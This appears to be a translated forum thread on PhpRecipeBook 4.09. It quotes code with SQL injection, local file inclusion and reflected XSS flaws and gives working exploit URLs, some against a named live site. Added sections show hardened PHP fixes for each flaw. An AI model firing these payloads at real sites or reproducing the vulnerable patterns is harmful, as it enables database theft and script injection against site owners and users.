Vulnerability: SQL
File: modules\recipes\search.php
PHP:
if ($_REQUEST["course_id"]) $query .= " recipe_course=" . $_REQUEST["course_id"] . " AND";
if ($_REQUEST["base_id"]) $query .= " recipe_base=" . $_REQUEST["base_id"] . " AND";
if ($_REQUEST["ethnic_id"]) $query .= " recipe_ethnic=" . $_REQUEST["ethnic_id"] . " AND";
if ($_REQUEST["time_id"]) $query .= " recipe_prep_time=" . $_REQUEST["time_id"] . " AND";
if ($_REQUEST["difficult_id"]) $query .= " recipe_difficulty=" . $_REQUEST["difficult_id"] . " AND";
The query itself is further up; no time to go looking for it.
__http://www.bergiescookbook.com/cookbook/index.php?m=recipes&a=search&search=yes&base_id=-10+union+select+1,version(),3,4,5,6,7--

Vulnerability: LFI
Conditions: MQ=off
File: index.php
PHP:
$m = isset( $_GET['m'] ) ? $_GET['m'] : 'recipes';
$a = isset( $_GET['a'] ) ? $_GET['a'] : 'index';
include "modules/$m/$a.php";
__http://www.bergiescookbook.com/cookbook/index.php?m=recipes'&a=search'&search=yes&base_id=10

Off to bed, it's late; I'll finish it tomorrow.
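A hardened version of the search.php filter code from the post above, as an added example (not PhpRecipeBook's own code). It assumes a PDO handle in $db and the table name in $db_table_recipes; the column names are the ones quoted in the post. The original builds the WHERE clause by gluing $_REQUEST values straight into SQL text, which is exactly what the base_id=-10+union+select payload abuses. The rewrite fixes that two ways at once: the column to filter on comes from a fixed map the request cannot influence, and the value is validated as a positive integer and bound as PDO::PARAM_INT, so it can never become SQL.

```php
<?php
// Added example, not PhpRecipeBook code. Assumes $db (PDO) and
// $db_table_recipes are set up elsewhere, as in the original app.

// Request parameter => column it is allowed to filter on.
// Anything not listed here is ignored; the column name never comes from the request.
const RECIPE_FILTERS = [
    'course_id'    => 'recipe_course',
    'base_id'      => 'recipe_base',
    'ethnic_id'    => 'recipe_ethnic',
    'time_id'      => 'recipe_prep_time',
    'difficult_id' => 'recipe_difficulty',
];

/**
 * Build the WHERE clause and its bound parameters from the request array.
 * Returns [sqlFragment, params]; sqlFragment is '' when no filter applies.
 */
function build_recipe_filter(array $request): array
{
    $clauses = [];
    $params  = [];
    foreach (RECIPE_FILTERS as $param => $column) {
        if (!isset($request[$param]) || $request[$param] === '') {
            continue;
        }
        // Only a plain positive integer is accepted; "-10 union select ..." fails here.
        $id = filter_var(
            $request[$param],
            FILTER_VALIDATE_INT,
            ['options' => ['min_range' => 1]]
        );
        if ($id === false) {
            continue; // drop the bad filter (or reject the request, if you prefer)
        }
        $clauses[] = "$column = :$param";
        $params[":$param"] = $id;
    }
    $where = $clauses ? ' WHERE ' . implode(' AND ', $clauses) : '';
    return [$where, $params];
}

[$where, $params] = build_recipe_filter($_REQUEST);

// $db_table_recipes is a server-side constant, not user input.
$stmt = $db->prepare("SELECT * FROM $db_table_recipes$where");
foreach ($params as $name => $value) {
    $stmt->bindValue($name, $value, PDO::PARAM_INT);
}
$stmt->execute();
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
```

With this in place, base_id=-10+union+select+1,version(),3,4,5,6,7-- is simply not an integer and the filter is dropped; a legitimate base_id=10 is bound as the integer 10. The same bound-integer treatment applies to any numeric id that lands in a WHERE clause.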
Vulnerability: Blind SQL
File: modules\recipes\view.php
PHP:
$recipe_id = isset( $_GET['recipe_id'] ) ? $_GET['recipe_id'] : 0;
$show_ratings = isset ($_GET['show_ratings'] ) ? true : false;
$show_ratings = isset($_GET['show_ratings']) ? isset($_GET['show_ratings']) : $g_rb_show_ratings;
#Construct the Query and do most of the setup first, the print html
$sql = "SELECT $db_table_recipes.*, ethnic_desc, base_desc, course_desc, time_desc, difficult_desc, user_name
    FROM $db_table_recipes
    LEFT JOIN $db_table_ethnicity ON ethnic_id = recipe_ethnic
    LEFT JOIN $db_table_bases ON base_id = recipe_base
    LEFT JOIN $db_table_courses ON course_id = recipe_course
    LEFT JOIN $db_table_prep_time ON time_id = recipe_prep_time
    LEFT JOIN $db_table_difficulty ON difficult_id = recipe_difficulty
    LEFT JOIN $db_table_users ON user_login = recipe_owner
    WHERE recipe_id = $recipe_id";

Vulnerability: LFI
PHP:
if (!empty( $_REQUEST['dosql'] )) {
    include "modules/$m/".$_REQUEST['dosql'].".php";
}
__http://www.bergiescookbook.com/cookbook/index.php?dosql='

Vulnerability: pXSS
PHP:
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass"><?php echo $LangUI->_('Mass');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume"><?php echo $LangUI->_('Volume');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume2mass"><?php echo $LangUI->_('Volume to mass');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass2volume"><?php echo $LangUI->_('Mass to volume');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=temperature"><?php echo $LangUI->_('Temperature');?></a>
It was this code that sent me looking for XSS in the first place, am I right??
_http://www.bergiescookbook.com/cookbook/index.php?m=utils&a=converter&type=volume/%3E%3Cscript%3Ealert(/%C1%F3%EA%E8%ED%E0%F2%EE%F0/)%3C/script%3E
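Both LFI sites quoted in this thread (index.php's include "modules/$m/$a.php" in the first post and the dosql include in the post above) have the same root cause: a request value is spliced into an include path unchanged. With magic_quotes off, "../" traversal works on any PHP version, and on PHP before 5.3.4 a trailing %00 also truncates the ".php" suffix. The following is an added example of one resolver that serves both sites; it is not PhpRecipeBook's code and assumes the modules directory sits next to index.php (MODULES_DIR is an assumed constant).

```php
<?php
// Added example, not PhpRecipeBook code. Assumes modules/ lives beside this file.

const MODULES_DIR = __DIR__ . '/modules';

/**
 * Resolve modules/<module>/<action>.php safely.
 * Returns the absolute path, or null if the request must be rejected.
 */
function resolve_module_file(string $module, string $action): ?string
{
    // 1. Syntactic allow-list: short lowercase identifiers only. This alone
    //    rejects "../", NUL bytes, quotes and every other path trick.
    foreach ([$module, $action] as $part) {
        if (!preg_match('/\A[a-z][a-z0-9_]{0,31}\z/', $part)) {
            return null;
        }
    }
    // 2. Defence in depth: after canonicalisation the file must exist and
    //    still lie under MODULES_DIR (realpath() collapses any symlink games).
    $base = realpath(MODULES_DIR);
    $path = realpath(MODULES_DIR . "/$module/$action.php");
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

/** Resolve or stop with a 404; never echoes the offending value back. */
function include_module_file(string $module, string $action): void
{
    $file = resolve_module_file($module, $action);
    if ($file === null) {
        http_response_code(404);
        exit('Unknown module or action');
    }
    include $file;
}

$m = (string) ($_GET['m'] ?? 'recipes');
$a = (string) ($_GET['a'] ?? 'index');

// index.php's main include: include "modules/$m/$a.php"
include_module_file($m, $a);

// The dosql include is just another action name under the same module,
// so it goes through the same resolver instead of being concatenated.
if (!empty($_REQUEST['dosql'])) {
    include_module_file($m, (string) $_REQUEST['dosql']);
}
```

The regex check is the real control; the realpath() prefix test is there so a mistake in the regex, or a symlink dropped into modules/, still cannot pull a file from outside the directory. The same int validation used for the search filters is what view.php's recipe_id needs before it reaches "WHERE recipe_id = $recipe_id".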
PhpRecipeBook 4.09 SQL injection
Vulnerable POST parameter: sm_login_id
Dependencies: mq = off
Vector: union-query
Vulnerable code:
PHP:
$sm_login_id = isset( $_POST['sm_login_id'] ) ? $_POST['sm_login_id'] : '';
$sm_password = isset( $_POST['sm_password'] ) ? $_POST['sm_password'] : '';
if ($sm_login_id != "") {
    // try login if they are passing us a login ID
    if (!$SMObj->login($sm_login_id,$sm_password)) {
        $SMObj->addErrorMsg($SMObj->_('Login Failed! Please try again.'));
    }
}
login function:
PHP:
function login($login='',$password='') {
    if ($login=="" && $login=="") {
        $login = $this->_autoLoginUser;
        $password = $this->_autoLoginPasswd;
    }
    $sql = "SELECT * FROM " . $this->_db_table_prefix . $this->_db_table_users . " WHERE user_login = '$login' AND user_password = '" . md5($password) . "'";
Exploit:

passive XSS (reflected)
Vulnerable parameter: keywords
Dependencies: mq = off
Vulnerable code:
PHP:
<input type="text" name="keywords" class="field_textbox" value="<?php echo $keywords;?>">
Exploit: [127.0.0.1/phprecipebook/index.php?m=recipes&a=search&keywords="><script>alert('Antichat')</script>&search=yes]
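An added example (not PhpRecipeBook's code) of the two fixes this post calls for, plus the reflected XSS from the converter links in the previous post. The login() quoted above builds "WHERE user_login = '$login' AND user_password = '" . md5($password) . "'" from the raw POST value, so with magic_quotes off a crafted sm_login_id closes the quote and appends a UNION. The rewrite looks the user up with a bound parameter, keeps the password out of SQL entirely and compares it in PHP against a password_hash() digest (assumed here instead of the app's plain md5 column; legacy md5 rows would need rehashing on first login). The keywords and $PHP_SELF echoes get one escaping helper. $db (PDO) and the table name are assumed to be provided by the caller, as in the original class.

```php
<?php
// Added example, not PhpRecipeBook code. Assumes $db is a PDO handle and
// that user_password holds password_hash() digests rather than md5.

/**
 * Look up the user by login name with a bound parameter; the password
 * never touches SQL text. Returns the user row or null on failure.
 */
function login_user(PDO $db, string $table, string $login, string $password): ?array
{
    if ($login === '') {
        return null;   // no silent auto-login fallback
    }
    // $table is the server-side prefix + users table, not request data.
    $stmt = $db->prepare("SELECT * FROM $table WHERE user_login = :login");
    $stmt->execute([':login' => $login]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($user === false) {
        return null;
    }
    // Constant-time check against a password_hash() digest.
    if (!password_verify($password, (string) $user['user_password'])) {
        return null;
    }
    return $user;
}

/** HTML-escape for both text and attribute contexts. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** The search form field, with the reflected value escaped. */
function keywords_field(string $keywords): string
{
    return '<input type="text" name="keywords" class="field_textbox" value="'
        . e($keywords) . '">';
}

/** One converter link; both the script path and the type value are escaped. */
function converter_link(string $phpSelf, string $type, string $label): string
{
    return '<a href="' . e($phpSelf) . '?m=utils&amp;a=converter&amp;type='
        . rawurlencode($type) . '">' . e($label) . '</a>';
}

// Usage at the login site from the post:
$sm_login_id = (string) ($_POST['sm_login_id'] ?? '');
$sm_password = (string) ($_POST['sm_password'] ?? '');
if ($sm_login_id !== '') {
    $user = login_user($db, $db_table_prefix . $db_table_users, $sm_login_id, $sm_password);
    if ($user === null) {
        // same generic message as before; do not echo the submitted login back
        $SMObj->addErrorMsg($SMObj->_('Login Failed! Please try again.'));
    }
}

echo keywords_field((string) ($_GET['keywords'] ?? ''));
echo converter_link($_SERVER['PHP_SELF'], 'volume', 'Volume');
```

Fed the keywords payload from the post, keywords_field() emits value="&quot;&gt;&lt;script&gt;alert(&#039;Antichat&#039;)&lt;/script&gt;", which stays inside the attribute. The login query now contains only a placeholder, so a UNION in sm_login_id is just a login name that does not exist; note that the error message is kept generic and the submitted value is not reflected, which also removes a second XSS sink.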